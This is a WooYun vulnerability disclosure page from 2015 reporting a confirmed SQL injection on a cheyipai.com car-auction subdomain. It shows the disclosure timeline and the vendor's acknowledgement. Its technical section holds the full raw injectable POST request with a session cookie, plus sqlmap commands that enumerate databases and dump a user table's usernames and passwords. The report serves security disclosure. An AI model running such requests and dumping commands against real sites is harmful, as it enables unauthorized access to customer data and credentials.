当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158482

漏洞标题:车易拍某分站存在SQL注入漏洞

相关厂商:cheyipai.com

漏洞作者: 小苹果

提交时间:2015-12-06 00:45

修复时间:2016-01-21 10:30

公开时间:2016-01-21 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-06: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

车易拍某分站存在SQL注入漏洞,存在14个数据库,泄漏了大量客户信息,包含姓名,邮箱,电话,账号密码等。

详细说明:

post类型的注入:

POST http://liantong.cheyipai.com/Auction/List HTTP/1.1
Origin: http://liantong.cheyipai.com
Content-Length: 113
Accept-Language: zh-CN,zh;q=0.8
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Dnt: 1
Host: liantong.cheyipai.com
X-Requested-With: XMLHttpRequest
Cookie: gaofeng=gaofeng; DMPESHOP=B14E7AD5B463EBAECA20FD59B420D07C20CF9D384DF25CB5A3E20E752343C8C059AD731D50223198F64AACF45C4B4003148F456BE4047E0C218FDBD1C01F78B1D026DEBA3653890607D3146675716A5182DA336E55A33FD47FD7D77357273CF897CD5F91A88EDAD7D044DDC0690A99C68B37E557A2955A2D2D3C06C36D3D3FA2F4EE6C3D7679AEB710438E0783D2229A44BD3B07F5A70599B22C27464F25E4FD407264C87CF048B592A91F984B82B947252F4F6DE3C178D0BE0660848195C714B1BEA640DF9AE0199AE0691B8E35DEACC711A7D8789B68191459EE79DB5DB4D34EFC288900D1D1957C0D76C7AD02B93D87CDD701358F08ADD616ED2A893C80A3E0E5CD08B9FF3B08810E50999304663F05C4742CBD82AC7890816A8E90D9CA5E14D3D228E0E4D74EBDD525EE8DD5BB017D5E67231BF027E284EBF59EC7A00076B733FAE2FA506566007DB9E97D750CB45F7736210D3274F2E4D7FBD14920AD8C67CCDECB81E6AF6D4B23ED052E324E09BEAEA685EB27AF766267627C318B8BA27761E2874EB54E56B7AAA87D694B5804DAEFF6E22484EFFC47DEACCAA93F4D2EC5453E56FA9B1CD7DCCCAA5E34A86F24816885613F1CD79E754CBB87F92C8697DE35F279498DF73650EB4F5FE33C1E42BE1E380968CF8C6566DBBACCA6327E21CC62999AFD275A78387384A541214CCF890E5120C892361F43F0095255FD8919925E381513775A0EF477501EB307F51AFCB73BC90B373E58B52C858C0CBDA3695B3DF6A93EDD09E6ADF23FB24AB2D5F8A55CA4EDBEB333E42C0E1FF54159D4AF4AAC65A0D267D379B31B7A26063EC55E1748B6A0A048ED044A7FABB1304CC0974751A7DEEE89391BEE6146A550A3E85CF26363A91B53AE165022093170809316E13E89384C6ADD205C3783319E215C9B2A864DAA9547C22E675C797E8AFC620BBB49DE698EAE33E72012D5D2AA9DB9A9EC242E3803B90F0BDDC8CACB3DC5692DFA75B668C3AA7C95C89D3327533A8B4C20844B0FD385F5FB037F09C0F0707434D185998A04EE20C2177200A75E740575424AF9F4FD99910A15D34C385C5EE1C30DE0BAD19E10DED28A33AA10AEDB261793311E78EDB7218F9C1A7794DCD1A2081DFCBC04AD78EC6D1EC8BEC6B89EB7F1D4E5CAAD4DCE60CCFE17784AD2340BECEFEF1C241D9885BBECDD49986F900AA7901B33AB28645EAC2936E8B3F456AB07ED81C83D1B41AE44CD9F8E143A296776F85322C1DC3FAE95173F1B06998D89B5F560F42E5405300FE404B5D214B049AEAEA1EEB480D4385CA90F5C3247C6F27D8897B4A8DB795EFCCBA06565692E22C5B8C385FECA537F29A50CD0A82D44129DFF41907BC9110FD17CADDD42E2530C430901E262A6FFFC4FBD3BA6FC9FB9DDF766C93CFA206514C8C06803BB043899AB2AEB31B35D748F989140FD20E6FB8C383C2356415B93C9B7D069658AE867799396BE481EAAD1E6C4E6970EE629B9387430E75F2EF07F783A193C5B8044AFD83B165F40AC096F2F264ADDA7776F9CDB763E565D4E7DE404A70F6A2735D53AE43EC95970B3B2CB642EADAAC6438A43080AE280A38B60585DE3166B9411A37DD38C8E1193EFFB64853221AFFA430C2181FD9D7C267BD5824F7C739CDDF1E0FEEEF1B68A0C6F2BEAD0FCB10A3A143DD29E9BAF5CD97FCF610A4FC4B95C413BE06115159B57358D552CFE399685CDC1CA7B309A9DBC7EFF9BC819CDFF0F01410D27F13CC567CE1E0C6DCD11185C0D86E846FB4A872042980E6E45F9B48086F4695B0D138AFA45399B0AE7F3C9A3F62FB763953A21A77AF311276A11CD1D7D9EA615E66120FBBE915BA9D3EC5D516E1D765B0B1ABA9C42943B6016FB555990186B825A0FA69FA8E055210F6FA1946F76886C79C2A2A4649180D48DA0B4767DFF1699B6
Referer: http://liantong.cheyipai.com/PContrller/Auction/Index
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
zcd=&szd=&price=&score=&level=&carAge=&Mileage=&orderBy=PreviewTime&orderByType=DESC&carName=null&domain=liantong


sqlmap -r 2.txt --dbs


存在14个数据库

漏洞证明:

存在的数据库如图:

屏幕快照 2015-12-05 下午12.13.55.png


随意选了一个数据库进行注入

sqlmap -r 2.txt -D NewScoredb --tables<code>

屏幕快照 2015-12-05 下午12.14.17.png

sqlmap -r 2.txt -D NewScoredb -T Score_UserInfo -C UserName,Password --dump-all</code>
泄漏了大量的客户信息:

屏幕快照 2015-12-05 下午12.14.50.png

修复方案:

关闭或者过滤

版权声明:转载请注明来源 小苹果@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-12-07 10:22

厂商回复:

漏洞利用之前漏洞爆出的弱口令登录后获取cookie后进行,也算是一次成功的渗透,感谢提交,我们会尽快修复

最新状态:

暂无


漏洞评价:

评价